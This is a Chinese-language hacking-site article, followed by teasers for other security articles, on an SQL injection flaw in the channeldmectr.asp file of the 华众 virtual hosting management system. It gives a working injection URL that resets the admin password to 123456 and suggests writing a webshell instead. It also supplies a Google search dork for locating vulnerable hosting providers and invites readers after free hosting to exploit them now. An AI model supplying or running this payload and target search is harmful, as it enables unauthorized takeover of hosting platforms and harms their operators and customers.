华众虚拟主机管理系统的漏洞补丁
这次漏洞出在channeldmectr.asp这个文件上,跟本就没有过滤任何参数.
正好我这里有正版的补丁,打开看下了,打上补丁的channeldmectr.asp文件在第21行到第40行,增加了以下代码:
代码的大概意思是对其中红色部分的参数进行过滤,禁止提交,防止执行构造好的SQL语句.
利用方法如下:
http://www.xxx.com/incs/channeldmectr.asp?domainname=1′);{我们构造的语句}–
下面给出一个示范语句:
http://www.xxx.com/incs/channeldmectr.asp?domainname=1′);Update [memlst] SET u_pss=’e10adc3949ba59abbe56e057f20f883e’ Where u_nme=’admin’–
语句的意思是将管理员账号admin的密码改为123456.
当然大家也可以灵活运用,构造其他语句,比如写一句话马进去之类的,这里省略.
最后丢个关键词给大家,Google搜索inurl:pdtshw/hstshw会出来大批的使用华众平台的IDC站点..转自www.hacksb.cn
我这个人比较善良,放出独家收藏华众近期出现的所有漏洞的补丁,有需要的朋友可以下载.
OK,就介绍到这里,想拿免费空间的淫们现在也可以行动了..
补丁下载地址
(本文为普瑞斯特编辑整理) http://www.hacksb.cn
黑客技术入门 网络密码十大破解方法
个人网络密码安全是整个网络安全的一个重要环节,如果个人密码遭到黑客破解,将引起非常严重的后果,例如网络银行的存款被转账盗用,网络游戏内的装备或者财产被盗,QQ币被盗用等等,增强网民的网络安全意识是网
详情2018-01-03 09:05:38责编:llp 来源:驱动管家科迅会员上传webshell漏洞?文件webshell漏洞怎么修复?
会员上传文件漏洞,可以上传任意后缀user swfupload asp文件漏洞复制代码代码如下:If UpFileObj Form( "NoReName ")= "1 " Then & 39;不更名Dim PhysicalPath,FsoObj:Set FsoObj = KS InitialObject(KS Settin
详情2018-01-11 14:54:27责编:llp 来源:驱动管家电脑防火墙在哪里设置?防火墙的设置方法(iptables篇)
Firewall 防火墙,工作在网络或主机的边缘,对进出本网络或主机的数据包根据事先设置好的规则进行检查并且能够在数据包匹配到之后由预置的动作进行处理的组件的组合,有规则(符合条件,就有规则指定的动作进行处
详情2018-01-05 13:27:00责编:llp 来源:驱动管家加密文件系统efs怎么加密文件?efs怎么解密?
经常看到对文件和文件夹加密的文章,大多是安装各种软件来实现的,如果你的系统是WinXP Win2003 2000,就没有必要如此兴师动众地加密了,既不需要你安装软件,也不需要繁琐的操作,因为Windows本身就集成了EFS(En
详情2018-01-11 13:35:09责编:llp 来源:驱动管家创建dmz有哪些方法?使用防火墙创建dmz是其中一种
安全区的定义在建立安全网络过程中起着至关重要的作用。DMZ (Demilitarized Zone)是网络安全中最重要的分区术语。因为DMZ包含设备性质,所以将其同网络的其他部分分隔开来。这些设备通常是需要从公共网络上访问
详情2018-01-11 17:19:58责编:llp 来源:驱动管家短信验证码诈骗 警惕短信木马程序窃取信息
本以为有了手机短信验证应该很安全了,没想到银行卡里的钱还是能被刷走,关键是一条短信都没收到。到底是怎么回事?原来是手机木马搞得鬼,很多奇怪的第三方软件作为木马拦截你的短信,发送到黑客的邮箱,然后转
详情2018-01-10 11:34:19责编:llp 来源:驱动管家什么是md5加密?md5加密是安全的吗?
一直以来MD5加密验证的安全性都是非常高的,很多论坛和软件都将用户名对应密码通过MD5加密后保存,和以往仅仅明文保存相比,MD5加密后的保存信息更加安全,毕竟MD5加密后的信息安全性更高,MD5加密方式也是单向的
详情2018-01-04 10:53:13责编:llp 来源:驱动管家远程软件怎么访问硬盘?远程软件访问硬盘的方法?
很多时候当一台计算机中毒以后,我们的远控软件就会查看到你硬盘的重要数据,从而将之盗取。我们怎么防止这种情况出现呢?其实您可以把硬盘加密码。但是如果入侵者用远控软件访问就不需要输入密码,直接就能访问
详情2018-01-09 08:52:31责编:llp 来源:驱动管家微软ie浏览器的脚本错误导致破坏漏洞出现
发布日期:2007-10-09 更新日期:2007-10-10 受影响系统: Microsoft Internet Explorer 7 0 Microsoft Internet Explorer 6 0 SP1 Microsoft Internet Explorer 6 0 Microsoft Internet Explorer 5 0 1 SP4 描述: ----------------------------
详情2018-01-10 12:22:18责编:llp 来源:驱动管家rootkit是什么?rootkit是如何隐形的?
一、综述本文将引领读者打造一个初级的内核级Rootkit,然后为其引入两种简单的隐形技术:进程隐形技术和文件隐形技术。同时,为了让读者获得rootkit编程的相关经验,我们顺便介绍了rootkit的装载、卸载方法,以及
详情2018-01-12 14:51:50责编:llp 来源:驱动管家
- Win10专业版和家庭版怎么关闭驱动的自动更新?
- 阿里旺旺自动回复在哪儿设置?阿里旺旺自动回复设置
- 支付宝密码被锁多久可以自动解锁?怎样解锁支付宝密码?
- 磁带机备份究竟是怎样的?关于磁带机备份的介绍
- 机箱风扇接口的位置一般都接在哪里
- 想要删除电脑桌面上多余的ie发现图标无法删除怎么办
- iphone6s和iphone6的区别 iphone6s和iphone6选择哪个呢?
- 比特币钱包哪个好?比特币钱包怎么注册?
- dr.web大蜘蛛的病毒隔离路径设置有哪些?
- 打印机驱动怎么卸载?win7系统彻底卸载打印机驱动的方法
- 淘宝助理怎么上传数据包?淘宝助理怎么用?
- 斗鱼tv直播怎么这么卡?斗鱼tv直播卡顿怎么办?
- 电脑主板和内存不兼容的故障应该怎么解决
- 复印机的使用方法介绍:复印机复印文件的步骤
- 格式化c盘可以最安全可靠的方法都在这了
- 适合玩游戏的手机 适合玩游戏的手机有哪些?
- yy语音加入公会的方法是什么?yy语音怎么用?
- 恶意网站是什么网站?恶意网站的相关知识
- WinXP系统提示“检测到不兼容的键盘驱动程序”
- 支付宝登陆怎么保证账号安全?支付宝设置登陆设备重新登陆的方法